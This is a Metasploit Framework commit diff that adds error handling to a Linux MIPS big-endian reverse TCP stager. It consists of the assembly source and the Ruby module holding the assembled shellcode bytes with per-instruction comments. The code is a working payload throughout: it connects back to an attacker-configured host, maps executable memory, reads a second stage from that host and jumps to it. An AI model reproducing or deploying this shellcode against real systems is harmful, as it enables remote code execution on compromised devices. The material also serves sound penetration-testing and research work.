Land #8653, add error handling to mipsbe linux reverse tcp stager
This commit is contained in:
commit
75c571de83
|
@ -1,11 +1,11 @@
|
||||||
##
|
##
|
||||||
#
|
#
|
||||||
# Name: stager_sock_reverse
|
# Name: stager_sock_reverse
|
||||||
# Type: Stager
|
# Type: Stager
|
||||||
# Qualities: No Nulls out of the IP / Port data
|
# Qualities: No Nulls out of the IP / Port data
|
||||||
# Platforms: Linux MIPS Big Endian
|
# Platforms: Linux MIPS Big Endian
|
||||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>, tkmru
|
||||||
# License:
|
# License:
|
||||||
#
|
#
|
||||||
# This file is part of the Metasploit Exploit Framework
|
# This file is part of the Metasploit Exploit Framework
|
||||||
# and is subject to the same licenses and copyrights as
|
# and is subject to the same licenses and copyrights as
|
||||||
|
@ -27,101 +27,117 @@
|
||||||
# generate the string to place on:
|
# generate the string to place on:
|
||||||
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
|
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
|
||||||
##
|
##
|
||||||
.text
|
.text
|
||||||
.align 2
|
.align 2
|
||||||
.globl main
|
.globl main
|
||||||
.set nomips16
|
.set nomips16
|
||||||
main:
|
main:
|
||||||
.set noreorder
|
.set noreorder
|
||||||
.set nomacro
|
.set nomacro
|
||||||
|
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||||
|
# a0: domain = PF_INET (2)
|
||||||
|
# a1: type = SOCK_STREAM (2)
|
||||||
|
# a2: protocol = IPPROTO_IP (0)
|
||||||
|
# v0: syscall = __NR_socket (4183)
|
||||||
|
li $t7, -6
|
||||||
|
nor $t7, $t7, $zero
|
||||||
|
addi $a0, $t7, -3
|
||||||
|
addi $a1, $t7, -3
|
||||||
|
slti $a2, $zero, -1
|
||||||
|
li $v0, 4183
|
||||||
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
||||||
|
|
||||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16)
|
||||||
# a0: domain = PF_INET (2)
|
# a0: sockfd
|
||||||
# a1: type = SOCK_STREAM (2)
|
# a1: addr = AF_INET (2)
|
||||||
# a2: protocol = IPPROTO_IP (0)
|
# a2: addrlen = 16
|
||||||
# v0: syscall = __NR_socket (4183)
|
# v0: syscall = __NR_connect (4170)
|
||||||
li $t7, -6
|
lw $a0, -4($sp)
|
||||||
nor $t7, $t7, $zero
|
li $t7, -3
|
||||||
addi $a0, $t7, -3
|
nor $t7, $t7, $zero
|
||||||
addi $a1, $t7, -3
|
sw $t7, -32($sp)
|
||||||
slti $a2, $zero, -1
|
lui $t6, 0x115c
|
||||||
li $v0, 4183
|
sw $t6, -28($sp)
|
||||||
syscall 0x40404
|
lui $t6, 0x7f00 # ip
|
||||||
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
ori $t6, $t6, 0x0001 # ip
|
||||||
|
sw $t6, -26($sp)
|
||||||
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
addiu $a1, $sp, -30
|
||||||
# a0: sockfd
|
li $t4, -17
|
||||||
# a1: addr = AF_INET (2)
|
nor $a2, $t4, $zero
|
||||||
# a2: addrlen = 16
|
li $v0, 4170
|
||||||
# v0: syscall = __NR_connect (4170)
|
syscall 0x40404
|
||||||
lw $a0, -4($sp)
|
slt $s0, $zero, $a3
|
||||||
li $t7, -3
|
bne $s0, $zero, failed
|
||||||
nor $t7, $t7, $zero
|
|
||||||
sw $t7, -32($sp)
|
|
||||||
lui $t6, 0x115c
|
|
||||||
sw $t6, -28($sp)
|
|
||||||
lui $t6, 0x7f00 # ip
|
|
||||||
ori $t6, $t6, 0x0001 # ip
|
|
||||||
sw $t6, -26($sp)
|
|
||||||
addiu $a1, $sp, -30
|
|
||||||
li $t4, -17
|
|
||||||
nor $a2, $t4, $zero
|
|
||||||
li $v0, 4170
|
|
||||||
syscall 0x40404
|
|
||||||
|
|
||||||
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
|
||||||
# a0: addr = -1
|
|
||||||
# a1: lenght = 4096
|
|
||||||
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
|
|
||||||
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
|
|
||||||
# sp(16): fd = -1
|
|
||||||
# sp(20): offset = 0
|
|
||||||
# v0: syscall = __NR_mmap (4090)
|
|
||||||
li $a0, -1
|
|
||||||
li $a1, 4097
|
|
||||||
addi $a1, $a1, -1
|
|
||||||
li $t1, -8
|
|
||||||
nor $t1, $t1, $0
|
|
||||||
add $a2, $t1, $0
|
|
||||||
li $a3, 2050
|
|
||||||
li $t3, -22
|
|
||||||
nor $t3, $t3, $zero
|
|
||||||
add $t3, $sp, $t3
|
|
||||||
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
|
|
||||||
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
|
||||||
li $v0, 4090
|
|
||||||
syscall 0x40404
|
|
||||||
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
|
||||||
|
|
||||||
# read(sockfd, addr, 4096)
|
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||||
# a0: sockfd
|
# a0: addr = -1
|
||||||
# a1: addr
|
# a1: lenght = 4096
|
||||||
# a2: len = 4096
|
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
|
||||||
# v0: syscall = __NR_read (4003)
|
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
|
||||||
lw $a0, -4($sp)
|
# sp(16): fd = -1
|
||||||
lw $a1, -8($sp)
|
# sp(20): offset = 0
|
||||||
li $a2, 4097
|
# v0: syscall = __NR_mmap (4090)
|
||||||
addi $a2, $a2, -1
|
li $a0, -1
|
||||||
li $v0, 4003
|
li $a1, 4097
|
||||||
syscall 0x40404
|
addi $a1, $a1, -1
|
||||||
|
li $t1, -8
|
||||||
|
nor $t1, $t1, $0
|
||||||
|
add $a2, $t1, $0
|
||||||
|
li $a3, 2050
|
||||||
|
li $t3, -22
|
||||||
|
nor $t3, $t3, $zero
|
||||||
|
add $t3, $sp, $t3
|
||||||
|
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
|
||||||
|
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
||||||
|
li $v0, 4090
|
||||||
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
||||||
|
|
||||||
# cacheflush(addr, nbytes, DCACHE)
|
# read(sockfd, addr, 4096)
|
||||||
# a0: addr
|
# a0: sockfd
|
||||||
# a1: nbytes
|
# a1: addr
|
||||||
# a2: cache = DCACHE (2)
|
# a2: len = 4096
|
||||||
# v0: syscall = __NR_read (4147)
|
# v0: syscall = __NR_read (4003)
|
||||||
lw $a0, -8($sp)
|
lw $a0, -4($sp)
|
||||||
add $a1, $v0, $zero
|
lw $a1, -8($sp)
|
||||||
li $t1, -3
|
li $a2, 4097
|
||||||
nor $t1, $t1, $0
|
addi $a2, $a2, -1
|
||||||
add $a2, $t1, $0
|
li $v0, 4003
|
||||||
li $v0, 4147
|
syscall 0x40404
|
||||||
syscall 0x40404
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
# jmp to the stage
|
|
||||||
lw $s1, -8($sp)
|
|
||||||
lw $s2, -4($sp)
|
|
||||||
jalr $s1
|
|
||||||
|
|
||||||
.set macro
|
# cacheflush(addr, nbytes, DCACHE)
|
||||||
.set reorder
|
# a0: addr
|
||||||
|
# a1: nbytes
|
||||||
|
# a2: cache = DCACHE (2)
|
||||||
|
# v0: syscall = __NR_read (4147)
|
||||||
|
lw $a0, -8($sp)
|
||||||
|
add $a1, $v0, $zero
|
||||||
|
li $t1, -3
|
||||||
|
nor $t1, $t1, $0
|
||||||
|
add $a2, $t1, $0
|
||||||
|
li $v0, 4147
|
||||||
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
# jmp to the stage
|
||||||
|
lw $s1, -8($sp)
|
||||||
|
lw $s2, -4($sp)
|
||||||
|
jalr $s1
|
||||||
|
|
||||||
|
failed:
|
||||||
|
# exit(status)
|
||||||
|
# a0: status
|
||||||
|
# v0: syscall = __NR_exit (4001)
|
||||||
|
li $a0, 1
|
||||||
|
li $v0, 4001
|
||||||
|
syscall 0x40404
|
||||||
|
|
||||||
|
.set macro
|
||||||
|
.set reorder
|
||||||
|
|
|
@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
|
||||||
|
|
||||||
module MetasploitModule
|
module MetasploitModule
|
||||||
|
|
||||||
CachedSize = 212
|
CachedSize = 272
|
||||||
|
|
||||||
include Msf::Payload::Stager
|
include Msf::Payload::Stager
|
||||||
include Msf::Payload::Linux
|
include Msf::Payload::Linux
|
||||||
|
@ -20,7 +20,8 @@ module MetasploitModule
|
||||||
'Description' => 'Connect back to the attacker',
|
'Description' => 'Connect back to the attacker',
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'juan vazquez'
|
'juan vazquez',
|
||||||
|
'tkmru'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'linux',
|
'Platform' => 'linux',
|
||||||
|
@ -30,26 +31,85 @@ module MetasploitModule
|
||||||
{
|
{
|
||||||
'Offsets' =>
|
'Offsets' =>
|
||||||
{
|
{
|
||||||
'LHOST' => [ [58, 62], 'ADDR16MSB' ],
|
'LHOST' => [ [66, 70], 'ADDR16MSB' ],
|
||||||
'LPORT' => [ 50, 'n' ],
|
'LPORT' => [ 58, 'n' ],
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
"\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" +
|
"\x24\x0f\xff\xfa" + # li t7,-6
|
||||||
"\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" +
|
"\x01\xe0\x78\x27" + # nor t7,t7,zero
|
||||||
"\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" +
|
"\x21\xe4\xff\xfd" + # addi a0,t7,-3
|
||||||
"\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" +
|
"\x21\xe5\xff\xfd" + # addi a1,t7,-3
|
||||||
"\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" +
|
"\x28\x06\xff\xff" + # slti a2,zero,-1
|
||||||
"\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" +
|
"\x24\x02\x10\x57" + # li v0,4183
|
||||||
"\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" +
|
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||||
"\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" +
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" +
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
|
"\x16\x00\x00\x36" + # bnez s0,0x4006bc <failed>
|
||||||
"\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
|
"\xaf\xa2\xff\xfc" + # sw v0,-4(sp)
|
||||||
"\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
|
"\x8f\xa4\xff\xfc" + # lw a0,-4(sp)
|
||||||
"\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
|
"\x24\x0f\xff\xfd" + # li t7,-3
|
||||||
"\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
|
"\x01\xe0\x78\x27" + # nor t7,t7,zero
|
||||||
"\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
|
"\xaf\xaf\xff\xe0" + # sw t7,-32(sp)
|
||||||
"\xf8\x09"
|
"\x3c\x0e\x11\x5c" + # lui t6,0x115c
|
||||||
|
"\xaf\xae\xff\xe4" + # sw t6,-28(sp)
|
||||||
|
"\x3c\x0e\x7f\x00" + # lui t6,0x7f00
|
||||||
|
"\x35\xce\x00\x01" + # ori t6,t6,0x1
|
||||||
|
"\xaf\xae\xff\xe6" + # sw t6,-26(sp)
|
||||||
|
"\x27\xa5\xff\xe2" + # addiu a1,sp,-30
|
||||||
|
"\x24\x0c\xff\xef" + # li t4,-17
|
||||||
|
"\x01\x80\x30\x27" + # nor a2,t4,zero
|
||||||
|
"\x24\x02\x10\x4a" + # li v0,4170
|
||||||
|
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
|
"\x16\x00\x00\x25" + # bnez s0,0x4006bc <failed>
|
||||||
|
"\x24\x04\xff\xff" + # li a0,-1
|
||||||
|
"\x24\x05\x10\x01" + # li a1,4097
|
||||||
|
"\x20\xa5\xff\xff" + # addi a1,a1,-1
|
||||||
|
"\x24\x09\xff\xf8" + # li t1,-8
|
||||||
|
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
||||||
|
"\x01\x20\x30\x20" + # add a2,t1,zero
|
||||||
|
"\x24\x07\x08\x02" + # li a3,2050
|
||||||
|
"\x24\x0b\xff\xea" + # li t3,-22
|
||||||
|
"\x01\x60\x58\x27" + # nor t3,t3,zero
|
||||||
|
"\x03\xab\x58\x20" + # add t3,sp,t3
|
||||||
|
"\xad\x60\xff\xff" + # sw zero,-1(t3)
|
||||||
|
"\xad\x62\xff\xfb" + # sw v0,-5(t3)
|
||||||
|
"\x24\x02\x0f\xfa" + # li v0,4090
|
||||||
|
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
|
"\x16\x00\x00\x15" + # bnez s0,0x4006bc <failed>
|
||||||
|
"\xaf\xa2\xff\xf8" + # sw v0,-8(sp)
|
||||||
|
"\x8f\xa4\xff\xfc" + # lw a0,-4(sp)
|
||||||
|
"\x8f\xa5\xff\xf8" + # lw a1,-8(sp)
|
||||||
|
"\x24\x06\x10\x01" + # li a2,4097
|
||||||
|
"\x20\xc6\xff\xff" + # addi a2,a2,-1
|
||||||
|
"\x24\x02\x0f\xa3" + # li v0,4003
|
||||||
|
# read(sockfd, addr, 4096)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
|
"\x16\x00\x00\x0c" + # bnez s0,0x4006bc <failed>
|
||||||
|
"\x8f\xa4\xff\xf8" + # lw a0,-8(sp)
|
||||||
|
"\x00\x40\x28\x20" + # add a1,v0,zero
|
||||||
|
"\x24\x09\xff\xfd" + # li t1,-3
|
||||||
|
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
||||||
|
"\x01\x20\x30\x20" + # add a2,t1,zero
|
||||||
|
"\x24\x02\x10\x33" + # li v0,4147
|
||||||
|
# cacheflush(addr, nbytes, DCACHE)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
|
"\x16\x00\x00\x03" + # bnez s0,0x4006bc <failed>
|
||||||
|
"\x8f\xb1\xff\xf8" + # lw s1,-8(sp)
|
||||||
|
"\x8f\xb2\xff\xfc" + # lw s2,-4(sp)
|
||||||
|
"\x02\x20\xf8\x09" + # jalr s1
|
||||||
|
# 4006bc <failed>:
|
||||||
|
"\x24\x04\x00\x01" + # li a0,1
|
||||||
|
"\x24\x02\x0f\xa1" + # li v0,4001
|
||||||
|
# exit(status)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x20\x08\x25" + # move at,at
|
||||||
|
"\x00\x20\x08\x25" # move at,at
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue